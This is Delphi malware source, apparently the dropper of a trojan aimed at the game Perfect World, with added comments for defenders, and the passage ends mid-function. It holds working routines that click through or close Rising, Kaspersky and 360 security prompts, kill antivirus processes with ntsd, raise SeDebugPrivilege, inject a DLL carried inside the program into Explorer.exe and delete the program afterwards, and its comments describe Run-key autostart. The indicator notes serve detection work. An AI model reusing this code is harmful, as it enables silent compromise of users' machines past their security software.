完美世界EXE包含部分代码
program nwizgj;
{$I Define.Inc}
{$R hook.res}
uses
Windows,
Messages,//tlhelp32,
FunUnit,
VarUnit in '..\Hook\VarUnit.pas',
myfunc in 'myfunc.pas';
//{$DEFINE Test}
const
// Path of the Windows "Run" autostart key. The main program writes a value named
// 'nwizgj' under HKEY_LOCAL_MACHINE at this path, so the EXE is started again at logon.
// Defender note: that Run value is the persistence indicator to look for.
CSTR_REGEdit = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run';
// Stop flag for the CloseKaoBa worker loop; set to true in the main program's finally block.
var flag_end:boolean;
// Original comment: "turn off the Kaspersky and Rising registry-detection feature".
// Worker loop (started with CreateThread by the main program) that runs until flag_end
// is set, sleeping 5 ms per pass. Each pass looks up known security-product prompt
// windows by class name / caption and sends synthetic left-button down/up messages to
// their "allow" / "OK" / "skip" buttons, or WM_CLOSE to the window itself.
// Defender note: the class names and captions below are the useful indicators. A
// background process that searches for security-product dialogs and sends click
// messages to them is answering the prompt in place of the user. Products that run
// their UI at a higher integrity level or validate where input comes from should not
// be affected by plain SendMessage clicks -- TODO confirm per product.
procedure CloseKaoBa;
var f1,f2:integer;
r1:trect;
s:string;
// Local copies of the standard window-message codes.
const WM_LBUTTONDOWN = $0201;
WM_LBUTTONUP = $0202;
WM_CLOSE = $0010;
begin
//d:=GetTickCount()+20*1000;
while true do
begin
// Exit once the main program signals completion.
if flag_end=true then break;
try
// Rising: registry-monitor prompt ('#32770' is the standard dialog window class).
s:='瑞星注册表监控提示';
f1:=findwindow('#32770',pchar(s));
if f1<>0 then
begin
SetForegroundWindow(f1);
SetActiveWindow(f1);
// Button captioned "agree to modification".
f2:=FindWindowEx(f1,0,'Button','同意修改');
if f2<>0 then
begin
// Move the cursor to the centre of the button, then send two down/up pairs.
getwindowrect(f2,r1);
setcursorpos(r1.Left+(r1.Right-r1.Left) div 2,r1.Top+(r1.Bottom-r1.Top) div 2);
//showmessage('a');
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
end;
// Button captioned "OK".
f2:=FindWindowEx(f1,0,'Button','确定');
if f2<>0 then
begin
getwindowrect(f2,r1);
setcursorpos(r1.Left+(r1.Right-r1.Left) div 2,r1.Top+(r1.Bottom-r1.Top) div 2);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
end
end;
// Rising: "IE execution protection" prompt (caption tried with and without a space).
f1:=findwindow('#32770','IE 执行保护');
if f1=0 then
f1:=findwindow('#32770','IE执行保护');
if f1<>0 then
begin
SetForegroundWindow(f1);
SetActiveWindow(f1);
// Button captioned "allow execution".
f2:=FindWindowEx(f1,0,'Button','允许执行');
if f2<>0 then
begin
getwindowrect(f2,r1);
setcursorpos(r1.Left+(r1.Right-r1.Left) div 2,r1.Top+(r1.Bottom-r1.Top) div 2);
//showmessage('a');
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
end;
// Button captioned "OK".
f2:=FindWindowEx(f1,0,'Button','确定');
if f2<>0 then
begin
getwindowrect(f2,r1);
setcursorpos(r1.Left+(r1.Right-r1.Left) div 2,r1.Top+(r1.Bottom-r1.Top) div 2);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
end
end;
// Rising Kaka ("Internet Security Assistant - IE leak-protection wall") prompt.
// The caption is assembled from fragments, presumably so the full product name
// does not appear as one literal in the binary -- worth knowing when writing
// string-based signatures.
s:='瑞';
s:=s+'星';
s:=s+'卡卡上网安全助手 - IE防漏墙';
f1:=findwindow(pchar('#32770'),pchar(s));
if f1<>0 then
begin
// Button captioned "allow".
f2:=FindWindowEx(f1,0,'Button','允许');
if f2<>0 then
begin
getwindowrect(f2,r1);
setcursorpos(r1.Left+(r1.Right-r1.Left) div 2,r1.Top+(r1.Bottom-r1.Top) div 2);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
end
end;
// Kaspersky (original comment uses a nickname for it).
f1:=findwindow('AVP.AlertDialog',nil);// original comment says "get the Rising window", but the AVP.* classes belong to the Kaspersky section
if f1<>0 then
begin
// Button captioned "create rule" (single down/up pair).
f2:=FindWindowEx(f1,0,'AVP.Button','创建规则');
if f2<>0 then
begin
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
end;
// Button captioned "allow", with or without the "(&A)" accelerator suffix.
f2:=FindWindowEx(f1,0,'AVP.Button','允许');
if f2=0 then
f2:=FindWindowEx(f1,0,'AVP.Button','允许(&A)');
if f2<>0 then
begin
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
end
else
begin
// No "allow" button: fall back to "skip", and if that is missing close the alert.
f2:=FindWindowEx(f1,0,'AVP.Button','跳过');
if f2=0 then
f2:=FindWindowEx(f1,0,'AVP.Button','跳过(&S)');
if f2<>0 then
begin
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
end
else
SendMessage(f1, WM_close, 0, 0);
end;
end;
// Notification window class, again built from two fragments; closed outright.
s:='AVP.Pr';
s:=s+'oduct_Notification';
f1:=findwindow(pchar(s),nil);
if f1<>0 then
SendMessage(f1, WM_close, 0, 0);
// Traffic-monitor prompt: click the button captioned "No", else close the window.
f1:=findwindow('AVP.TrafficMonConnectionTerm',nil);
if f1<>0 then
begin
f2:=FindWindowEx(f1,0,'AVP.Button','否');
if f2<>0 then
begin
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
end
else
SendMessage(f1, WM_close, 0, 0);
end;
//360safe
f1:=findwindow('Afx:400000:0','');
if f1<>0 then
begin
// Button captioned "allow this action"; "OK" is only looked up after it was found.
f2:=FindWindowEx(f1,0,'Button','允许此动作');
if f2<>0 then
begin
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
f2:=FindWindowEx(f1,0,'Button','确定');
if f2<>0 then
begin
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
end;
end;
end;
except
// Any exception in a pass is swallowed and the loop continues.
end;
//if GetTickCount()>d then break;
sleep(5);
end;
end;
// Enables (Enabled = true) or disables SeDebugPrivilege on the current process token.
// Returns true when GetLastError reports ERROR_SUCCESS after AdjustTokenPrivileges.
// Returns false when the token cannot be opened or an exception is swallowed.
// Defender note: the main program calls this before opening Explorer.exe with
// PROCESS_ALL_ACCESS. A non-debugger process enabling SeDebugPrivilege is a useful
// signal when correlated with cross-process handle opens.
function EnabledDebugPrivilege(const Enabled : Boolean) : Boolean;
var
hTk : THandle;
rtnTemp : Dword;
TokenPri : TOKEN_PRIVILEGES;
const
SE_DEBUG = 'SeDebugPrivilege';
begin
Result := False;
try
if (OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,hTk)) then
begin
TokenPri.PrivilegeCount := 1;
// The return value of the LUID lookup is not checked.
LookupPrivilegeValue(nil,SE_DEBUG,TokenPri.Privileges[0].Luid);
if Enabled then
TokenPri.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
else
TokenPri.Privileges[0].Attributes := 0;
rtnTemp := 0;
AdjustTokenPrivileges(hTk,False,TokenPri,sizeof(TokenPri),nil,rtnTemp);
// Success is judged by the thread's last-error value, not by the call's return value.
Result := GetLastError = ERROR_SUCCESS;
CloseHandle(hTk);
end;
except
end;
end;
// Original comment: "inject into process".
// Makes the process behind the handle Process load the DLL named by DLLPath:
// it allocates a 4096-byte read/write region in that process, copies 4096 bytes
// starting at DLLPath into it, and starts a remote thread whose start address is
// kernel32!LoadLibraryA with the region as its argument. It then waits for the
// thread and frees the region. Returns true only when a thread handle was obtained.
// Exceptions are swallowed.
// xVirtual_AllocEx, xCreate_RemoteThread and xVirtual_FreeEx are declared outside this
// listing -- presumably wrappers over the like-named Win32 calls; TODO confirm.
// Defender note: cross-process allocate + write + remote thread starting at
// LoadLibraryA is the behaviour to detect here. Look for remote-thread creation
// telemetry targeting Explorer.exe, followed by that process loading nwizgj.dll.
function InjectLibrary(Process: LongWord; DLLPath: pChar): Boolean;
var
BytesWritten: DWORD;
Thread: DWORD;
ThreadID: DWORD;
Parameters:pointer;
thh,m1,p1,s1:cardinal;
// Write_Process_Memory, hdll, thh and WriteProcessMemorys are declared but not used below.
Write_Process_Memory:function(hProcess: THandle; const lpBaseAddress: Pointer; lpBuffer: Pointer;
nSize: DWORD; var lpNumberOfBytesWritten: DWORD): BOOL;
hdll:integer;
WriteProcessMemorys:string;
begin
Result := False;
try
m1:=MEM_COMMIT;
p1:=PAGE_READWRITE;
s1:=4096;
Parameters := xVirtual_AllocEx(Process, nil, s1, m1, p1);
if Parameters = nil then Exit;
sleep(1);
WriteProcessMemory(Process, Parameters, Pointer(DLLPath), s1, BytesWritten);
Thread := xCreate_RemoteThread(Process, nil, 0, GetProcAddress(GetModuleHandle('KERNEL32.DLL'), 'LoadLibraryA'), Parameters, 0, @ThreadId);
WaitForSingleObject(Thread, INFINITE);
// The remote buffer is released before the thread handle is checked.
xVirtual_FreeEx(Process, Parameters, 0, MEM_RELEASE);
if Thread = 0 then Exit;
CloseHandle(Thread);
Result := True;
except
end;
end;
// Writes a resource embedded in this executable (name ResName, type ResType) to the
// file OutName, replacing any existing file. Returns true when WriteFile succeeded.
// Exceptions are swallowed. The main program calls it as ExtractRes('hook','dll',...)
// to drop the DLL linked in through {$R hook.res}.
// Defender note: the payload DLL travels inside the EXE and only appears on disk at
// run time, so file-creation telemetry for the dropped DLL is the observable event.
function ExtractRes(ResType, ResName, OutName: string): Boolean;
var
HResInfo: THandle;
HGlobal: THandle;
HFile: THandle;
Ptr: Pointer;
Size, N: Integer;
begin
Result := False;
try
HFile := INVALID_HANDLE_VALUE;
// Single-pass repeat..until True, used so Break can jump to the cleanup below.
repeat
HResInfo := FindResource(HInstance, PChar(ResName), PChar(ResType));
if HResInfo = 0 then Break;
HGlobal := LoadResource(HInstance, HResInfo);
if HGlobal = 0 then Break;
Ptr := LockResource(HGlobal);
Size := SizeOfResource(HInstance, HResInfo);
if Ptr = nil then Break;
HFile := CreateFile(PChar(OutName), GENERIC_READ or GENERIC_WRITE,
0, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
if HFile = INVALID_HANDLE_VALUE then Break;
if WriteFile(HFile, Ptr^, Size, LongWord(N), nil) then Result := True;
until True;
if HFile <> INVALID_HANDLE_VALUE then CloseHandle(HFile);
// Called on every path, including the failure paths, with attribute value 0.
SetFileAttributes(PChar(OutName), 0);
except
end;
end;
function FileExists(pszPath: string): BOOL; stdcall; external 'shlwapi.dll' Name 'PathFileExistsA';
// Self-deletion helper. Writes the batch file c:\mynw.bat, which loops deleting the
// file fn until it no longer exists and then deletes itself (%0). After one second
// the batch file is launched hidden through WinExec.
// The main program passes paramstr(0), i.e. the path of the running EXE.
// ProcessInfo and StartUpInfo are declared but not used.
// Defender note: creation of c:\mynw.bat and a hidden batch run that deletes its own
// parent image are the indicators this routine leaves behind.
procedure ExtDelMe(fn:string);
var
F: textfile;
ProcessInfo: TProcessInformation;
StartUpInfo: TStartupInfo;
const BatchFileName='c:\mynw.bat';
begin
AssignFile(F, BatchFileName);
Rewrite(F);
WriteLn(F, ':try');
WriteLn(F, 'del "' + fn + '"');
WriteLn(F, 'if exist "' + fn + '"' + ' goto try');
WriteLn(F, 'del %0');
CloseFile(F);
sleep(1000);
winexec(pchar(BatchFileName),sw_hide);
end;
function LowerCase(const S: string): string;
// ASCII-only lower-casing: 'A'..'Z' become 'a'..'z'; every other character is
// copied through unchanged (no locale or multi-byte awareness).
var
  Idx: Integer;
  Cur: Char;
begin
  SetLength(Result, Length(S));
  for Idx := 1 to Length(S) do
  begin
    Cur := S[Idx];
    if (Cur >= 'A') and (Cur <= 'Z') then
      Cur := Chr(Ord(Cur) + 32);
    Result[Idx] := Cur;
  end;
end;
function ExtractFileName(const FileName: string): string;
// Returns the part of FileName after its last backslash, or the whole string
// when it contains no backslash. Only '\' is treated as a separator.
var
  Idx, LastSep: Integer;
begin
  LastSep := 0;
  for Idx := 1 to Length(FileName) do
    if FileName[Idx] = '\' then
      LastSep := Idx;
  Result := Copy(FileName, LastSep + 1, Length(FileName) - LastSep);
end;
function AnsiCompareText(const S1, S2: string): Integer;
// Case-insensitive comparison in the user's default locale.
// CompareString returns 1/2/3 for less/equal/greater, so subtracting 2 gives the
// usual negative / zero / positive result.
var
  Outcome: Integer;
begin
  Outcome := CompareString(LOCALE_USER_DEFAULT, NORM_IGNORECASE,
    PChar(S1), Length(S1), PChar(S2), Length(S2));
  Result := Outcome - 2;
end;
// Register-level integer-to-text converter used by IntToStr below. It writes digits
// right-to-left into a caller-supplied buffer. The register contract is described in
// the block comment that follows.
procedure CvtInt;
{ IN:
EAX: The integer value to be converted to text
ESI: Ptr to the right-hand side of the output buffer: LEA ESI, StrBuf[16]
ECX: Base for conversion: 0 for signed decimal, 10 or 16 for unsigned
EDX: Precision: zero padded minimum field width
OUT:
ESI: Ptr to start of converted text (not start of buffer)
ECX: Length of converted text
}
asm
// Base 0 selects the signed-decimal path; any other base goes straight to the digit loop.
OR CL,CL
JNZ @CvtLoop
@C1: OR EAX,EAX
JNS @C2
// Negative value: convert its magnitude in base 10, then prepend '-'.
NEG EAX
CALL @C2
MOV AL,'-'
INC ECX
DEC ESI
MOV [ESI],AL
RET
@C2: MOV ECX,10
@CvtLoop:
// Save precision and the buffer end so the length can be computed afterwards.
PUSH EDX
PUSH ESI
// Digit loop: divide by the base, store the remainder as '0'..'9' or 'A'.. .
@D1: XOR EDX,EDX
DIV ECX
DEC ESI
ADD DL,'0'
CMP DL,'0'+10
JB @D2
ADD DL,('A'-'0')-10
@D2: MOV [ESI],DL
OR EAX,EAX
JNE @D1
// ECX := number of characters written; EDX := precision minus that length.
POP ECX
POP EDX
SUB ECX,ESI
SUB EDX,ECX
JBE @D5
// Precision exceeds the length: left-pad with '0' up to the requested width.
ADD ECX,EDX
MOV AL,'0'
SUB ESI,EDX
JMP @z
@zloop: MOV [ESI+EDX],AL
@z: DEC EDX
JNZ @zloop
MOV [ESI],AL
@D5:
end;
// Converts Value to its signed-decimal string form using CvtInt and a 16-byte
// scratch buffer on the stack. In this file it is used to build the
// 'ntsd -c q -p <pid>' command line in HasKV.
function IntToStr(Value: Integer): string;
// FmtStr(Result, '%d', [Value]);
asm
PUSH ESI
// ESI marks the right-hand end of the scratch buffer reserved just below it.
MOV ESI, ESP
SUB ESP, 16
XOR ECX, ECX // base: 0 for signed decimal
PUSH EDX // result ptr
XOR EDX, EDX // zero filled field width: 0 for no leading zeros
CALL CvtInt
// CvtInt leaves the text start in ESI and its length in ECX.
MOV EDX, ESI
POP EAX // result ptr
CALL System.@LStrFromPCharLen
ADD ESP, 16
POP ESI
end;
// Local re-declaration of the ToolHelp32 process-entry record, snapshot flags and
// kernel32 imports. The tlhelp32 unit is commented out in the uses clause, so the
// program declares the pieces it needs for process enumeration itself.
type
tagPROCESSENTRY32 = packed record
dwSize: DWORD;
cntUsage: DWORD;
th32ProcessID: DWORD; // this process
th32DefaultHeapID: DWORD;
th32ModuleID: DWORD; // associated exe
cntThreads: DWORD;
th32ParentProcessID: DWORD; // this process's parent process
pcPriClassBase: Longint; // Base priority of process's threads
dwFlags: DWORD;
szExeFile: array[0..MAX_PATH - 1] of Char;// Path
end;
TProcessEntry32 = tagPROCESSENTRY32;
const
// Snapshot content flags; the callers in this file always pass TH32CS_SNAPALL.
TH32CS_SNAPHEAPLIST = $00000001;
TH32CS_SNAPPROCESS = $00000002;
TH32CS_SNAPTHREAD = $00000004;
TH32CS_SNAPMODULE = $00000008;
TH32CS_SNAPALL = TH32CS_SNAPHEAPLIST or TH32CS_SNAPPROCESS or TH32CS_SNAPTHREAD or TH32CS_SNAPMODULE;
function CreateToolhelp32Snapshot(dwFlags, th32ProcessID: DWORD): THandle;stdcall;external kernel32 name 'CreateToolhelp32Snapshot';
function Process32First(hSnapshot: THandle; var lppe: TProcessEntry32): BOOL;stdcall;external kernel32 name 'Process32First';
function Process32Next(hSnapshot: THandle; var lppe: TProcessEntry32): BOOL;stdcall;external kernel32 name 'Process32Next';
// Looks through a process snapshot for the image names listed in pg[] and, for each
// match, launches 'ntsd -c q -p <pid>'. ntsd attaches to that PID and runs the "q"
// command, which ends the target process.
// Always returns false: the assignments to result are commented out.
// Only pg[1..3] are populated; pg[4..6] are commented out and stay empty.
// The names look like components of Chinese antivirus products (the source comment
// tags RUNIEP.EXE as Rising Kaka) -- vendor attribution for the others is not stated here.
// Defender note: a process spawning 'ntsd -c q -p' against security-product PIDs is a
// strong command-line indicator, and the image names below show which products were targeted.
function HasKV:boolean;
const maxp=6;
var
lppe: tprocessentry32;
sshandle: thandle;
found: boolean;
pg:array[1..maxp] of string;
pgh:array[1..maxp] of integer;
i:integer;
begin
result:=false;
// Clear the name table and the matching PID table.
for i:=1 to maxp do
begin
pg[i]:='';
pgh[i]:=0;
end;
pg[1]:='RUNIEP.EXE';// Rising Kaka
pg[2]:='KRegEx.exe';
pg[3]:='KVXP.kxp';
//pg[4]:='KVMonXP.kxp';
//pg[5]:='trojdie.kxp';
//pg[6]:='uihost.exe';
sshandle := createtoolhelp32snapshot(TH32CS_SNAPALL, 0);
found := process32first(sshandle, lppe);
while found do
begin
// Case-insensitive match on the file-name part of the image path; remember the PID.
for i:=1 to maxp do
if pg[i]<>'' then
if AnsiCompareText(lowercase(ExtractFileName(lppe.szExefile)),lowercase(pg[i])) = 0 then
begin
//result:=true;
//break;
pgh[i]:=lppe.th32ProcessID;
end;
//if result then break;
found := process32next(sshandle, lppe);
sleep(1);
end;
CloseHandle(sshandle);
// One ntsd invocation per recorded PID.
for i:=1 to maxp do
if pgh[i]<>0 then
begin
winexec(pchar('ntsd -c q -p '+inttostr(pgh[i])),SW_MINIMIZE);
end;
end;
// Returns true when a process whose image file name equals 'avp.exe' (compared
// case-insensitively) is found in the snapshot, otherwise false.
// The main program uses the result to decide whether to change the system clock.
// The name is built from 'avp' + '.exe', presumably so the full name is not a single
// literal in the binary.
function HasKaba:boolean;
const maxp=6;
var
lppe: tprocessentry32;
sshandle: thandle;
found: boolean;
pg:array[1..maxp] of string;
pgh:array[1..maxp] of integer;
i:integer;
begin
result:=false;
for i:=1 to maxp do
begin
pg[i]:='';
pgh[i]:=0;
end;
// Only slot 2 is populated.
pg[2]:='avp';
pg[2]:=pg[2]+'.exe';
sshandle := createtoolhelp32snapshot(TH32CS_SNAPALL, 0);
found := process32first(sshandle, lppe);
while found do
begin
for i:=1 to maxp do
if pg[i]<>'' then
if ansiCompareText(lowercase(ExtractFileName(lppe.szExefile)),lowercase(pg[i])) = 0 then
begin
result:=true;
break;
// Not reached: the break above leaves the for-loop first, so pgh[] stays zero.
pgh[i]:=lppe.th32ProcessID;
end;
if result then break;
found := process32next(sshandle, lppe);
sleep(1);
end;
CloseHandle(sshandle);
end;
// Original comment: "enumerate process names".
// Returns the process ID of the last snapshot entry whose szExeFile matches
// ProcessName according to CompareAnsiText, or 0 when nothing matches.
// CompareAnsiText is declared outside this listing; it is used here as a Boolean.
// The main program calls this with 'Explorer.exe' to pick the injection target.
function GetProcessID(ProcessName : String): DWORD;
var
Process32: TProcessEntry32;
ProcessSnapshot: THandle;
begin
Result := 0;
ProcessSnapshot := CreateToolHelp32SnapShot(TH32CS_SNAPALL, 0);
Process32.dwSize := SizeOf(TProcessEntry32);
Process32First(ProcessSnapshot, Process32);
// The loop does not stop at the first match, so a later match overwrites Result.
repeat
if CompareAnsiText(ProcessName, Process32.szExeFile) then Result := Process32.th32ProcessID;
until not (Process32Next(ProcessSnapshot, Process32));
CloseHandle(ProcessSnapshot);
end;
// Date/time types and constants used by the encode/decode helpers below. They are
// declared locally, and the uses clause lists no date/time unit.
type
PDayTable = ^TDayTable;
// Days per month, indexed 1..12.
TDayTable = array[1..12] of Word;
TTimeStamp = record
Time: Integer; { Number of milliseconds since midnight }
Date: Integer; { One plus number of days since 1/1/0001 }
end;
const
HoursPerDay = 24;
MinsPerHour = 60;
SecsPerMin = 60;
MSecsPerSec = 1000;
MinsPerDay = HoursPerDay * MinsPerHour;
SecsPerDay = MinsPerDay * SecsPerMin;
MSecsPerDay = SecsPerDay * MSecsPerSec;
// Typed copies of MSecsPerDay, referenced as memory operands by DateTimeToTimeStamp.
FMSecsPerDay: Single = MSecsPerDay;
IMSecsPerDay: Integer = MSecsPerDay;
// Offset added to the day count in DateTimeToTimeStamp and subtracted in TryEncodeDate.
DateDelta = 693594;
// Month lengths; index False = common year, True = leap year.
MonthDays: array [Boolean] of TDayTable =
((31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31),
(31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31));
// Splits a TDateTime into a TTimeStamp: Date receives the whole-day count plus
// DateDelta, Time receives the remainder in milliseconds.
function DateTimeToTimeStamp(DateTime: TDateTime): TTimeStamp;
asm
PUSH EBX
{$IFDEF PIC}
PUSH EAX
CALL GetGOT
MOV EBX,EAX
POP EAX
{$ELSE}
XOR EBX,EBX
{$ENDIF}
// ECX is used further down as the address of the TTimeStamp result.
MOV ECX,EAX
// DateTime * milliseconds-per-day, stored as a 64-bit integer on the stack.
FLD DateTime
FMUL [EBX].FMSecsPerDay
SUB ESP,8
FISTP QWORD PTR [ESP]
FWAIT
// EAX = low dword, EDX = high dword of the millisecond count.
POP EAX
POP EDX
OR EDX,EDX
JNS @@1
// Negative count: divide the magnitude, then negate the quotient.
NEG EDX
NEG EAX
SBB EDX,0
DIV [EBX].IMSecsPerDay
NEG EAX
JMP @@2
@@1: DIV [EBX].IMSecsPerDay
// Quotient (days) gets DateDelta added; remainder (ms) becomes the Time field.
@@2: ADD EAX,DateDelta
MOV [ECX].TTimeStamp.Time,EDX
MOV [ECX].TTimeStamp.Date,EAX
POP EBX
end;
// Divides Dividend by Divisor with a single 16-bit DIV and returns the quotient in
// Result and the remainder in Remainder (both Word).
procedure DivMod(Dividend: Integer; Divisor: Word;
var Result, Remainder: Word);
asm
PUSH EBX
// BX := divisor; DX:AX := the 32-bit dividend split into high and low words.
MOV EBX,EDX
MOV EDX,EAX
SHR EDX,16
DIV BX
// Store quotient (AX) through ECX and remainder (DX) through the Remainder pointer.
MOV EBX,Remainder
MOV [ECX],AX
MOV [EBX],DX
POP EBX
end;
function IsLeapYear(Year: Word): Boolean;
// Gregorian leap-year rule: divisible by 4, except century years that are not
// divisible by 400.
begin
  if Year mod 400 = 0 then
    Result := True
  else if Year mod 100 = 0 then
    Result := False
  else
    Result := Year mod 4 = 0;
end;
// Decodes the date part of DateTime into Year, Month, Day and DOW (day of week).
// When the timestamp's Date field is <= 0 all four outputs are set to 0 and the
// function returns False. Otherwise the return value is IsLeapYear of the decoded
// year, not a success flag.
function DecodeDateFully(const DateTime: TDateTime; var Year, Month, Day, DOW: Word): Boolean;
const
// Day counts for 1, 4, 100 and 400 consecutive years.
D1 = 365;
D4 = D1 * 4 + 1;
D100 = D4 * 25 - 1;
D400 = D100 * 4 + 1;
var
Y, M, D, I: Word;
T: Integer;
DayTable: PDayTable;
begin
T := DateTimeToTimeStamp(DateTime).Date;
if T <= 0 then
begin
Year := 0;
Month := 0;
Day := 0;
DOW := 0;
Result := False;
end else
begin
// Day of week in the range 1..7.
DOW := T mod 7 + 1;
Dec(T);
Y := 1;
// Peel off whole 400-year cycles first so the remainder fits the Word-based DivMod.
while T >= D400 do
begin
Dec(T, D400);
Inc(Y, 400);
end;
// Centuries within the cycle; a quotient of 4 means the last day of the cycle.
DivMod(T, D100, I, D);
if I = 4 then
begin
Dec(I);
Inc(D, D100);
end;
Inc(Y, I * 100);
// Four-year groups within the century.
DivMod(D, D4, I, D);
Inc(Y, I * 4);
// Years within the four-year group; a quotient of 4 means the leap day at its end.
DivMod(D, D1, I, D);
if I = 4 then
begin
Dec(I);
Inc(D, D1);
end;
Inc(Y, I);
Result := IsLeapYear(Y);
DayTable := @MonthDays[Result];
// Walk the month table until the remaining day count falls inside a month.
M := 1;
while True do
begin
I := DayTable^[M];
if D < I then Break;
Dec(D, I);
Inc(M);
end;
Year := Y;
Month := M;
Day := D + 1;
end;
end;
procedure DecodeDate(const DateTime: TDateTime; var Year, Month, Day: Word);
// Date-only wrapper over DecodeDateFully; the day-of-week output is discarded.
var
  IgnoredDOW: Word;
begin
  DecodeDateFully(DateTime, Year, Month, Day, IgnoredDOW);
end;
procedure DecodeTime(const DateTime: TDateTime; var Hour, Min, Sec, MSec: Word);
// Splits the time-of-day part of DateTime into hour, minute, second and millisecond.
const
  MSecsPerMin = SecsPerMin * MSecsPerSec;
var
  Stamp: TTimeStamp;
  WholeMinutes, MSecRemainder: Word;
begin
  Stamp := DateTimeToTimeStamp(DateTime);
  // Milliseconds since midnight -> whole minutes + leftover milliseconds.
  DivMod(Stamp.Time, MSecsPerMin, WholeMinutes, MSecRemainder);
  DivMod(WholeMinutes, MinsPerHour, Hour, Min);
  DivMod(MSecRemainder, MSecsPerSec, Sec, MSec);
end;
procedure DecodeDateTime(
  const AValue: TDateTime;
  out AYear, AMonth, ADay, AHour, AMinute, ASecond, AMilliSecond: Word);
// Decodes AValue into its seven calendar and clock fields: date part first, then
// time part.
begin
  DecodeDate(AValue, AYear, AMonth, ADay);
  DecodeTime(AValue, AHour, AMinute, ASecond, AMilliSecond);
end;
procedure DateTimeToSystemTime(const DateTime: TDateTime; var SystemTime: TSystemTime);
// Fills a Win32 SYSTEMTIME record from a TDateTime.
begin
  DecodeDateFully(DateTime, SystemTime.wYear, SystemTime.wMonth,
    SystemTime.wDay, SystemTime.wDayOfWeek);
  // Shift the day-of-week value produced by DecodeDateFully down by one.
  Dec(SystemTime.wDayOfWeek);
  DecodeTime(DateTime, SystemTime.wHour, SystemTime.wMinute,
    SystemTime.wSecond, SystemTime.wMilliseconds);
end;
function TryEncodeDate(Year, Month, Day: Word; out Date: TDateTime): Boolean;
// Validates Year (1..9999), Month (1..12) and Day (1..days in that month) and, when
// valid, stores the corresponding date value in Date and returns True.
// On invalid input Date is left untouched and the result is False.
var
  M, PriorYears, DayOfYear: Integer;
  Table: PDayTable;
begin
  Result := False;
  Table := @MonthDays[IsLeapYear(Year)];
  if not ((Year >= 1) and (Year <= 9999) and (Month >= 1) and (Month <= 12) and
    (Day >= 1) and (Day <= Table^[Month])) then
    Exit;
  // Day of month plus the lengths of all preceding months.
  DayOfYear := Day;
  for M := 1 to Month - 1 do
    Inc(DayOfYear, Table^[M]);
  PriorYears := Year - 1;
  Date := PriorYears * 365 + PriorYears div 4 - PriorYears div 100 +
    PriorYears div 400 + DayOfYear - DateDelta;
  Result := True;
end;
// Returns the date value for Year/Month/Day via TryEncodeDate.
// The Boolean outcome is ignored: for an invalid date TryEncodeDate does not assign
// its out parameter, so Result is left unassigned here.
function EncodeDate(Year, Month, Day: Word): TDateTime;
begin
TryEncodeDate(Year, Month, Day, Result);
end;
function TryEncodeTime(Hour, Min, Sec, MSec: Word; out Time: TDateTime): Boolean;
// Validates the four clock fields and, when all are in range, stores the time of day
// in Time as a fraction of a day. On invalid input Time is left untouched.
var
  TotalMSecs: Integer;
begin
  Result := (Hour < HoursPerDay) and (Min < MinsPerHour) and
    (Sec < SecsPerMin) and (MSec < MSecsPerSec);
  if not Result then
    Exit;
  // Milliseconds elapsed since midnight.
  TotalMSecs := Hour * (MinsPerHour * SecsPerMin * MSecsPerSec) +
    Min * (SecsPerMin * MSecsPerSec) +
    Sec * MSecsPerSec +
    MSec;
  Time := TotalMSecs / MSecsPerDay;
end;
// Returns the time-of-day value for Hour/Min/Sec/MSec via TryEncodeTime.
// The Boolean outcome is ignored: for out-of-range fields TryEncodeTime does not
// assign its out parameter, so Result is left unassigned here.
function EncodeTime(Hour, Min, Sec, MSec: Word): TDateTime;
begin
TryEncodeTime(Hour, Min, Sec, MSec, Result);
end;
function Now: TDateTime;
// Current local date and time as a TDateTime, read through GetLocalTime.
var
  LocalNow: TSystemTime;
  DatePart, TimePart: TDateTime;
begin
  GetLocalTime(LocalNow);
  DatePart := EncodeDate(LocalNow.wYear, LocalNow.wMonth, LocalNow.wDay);
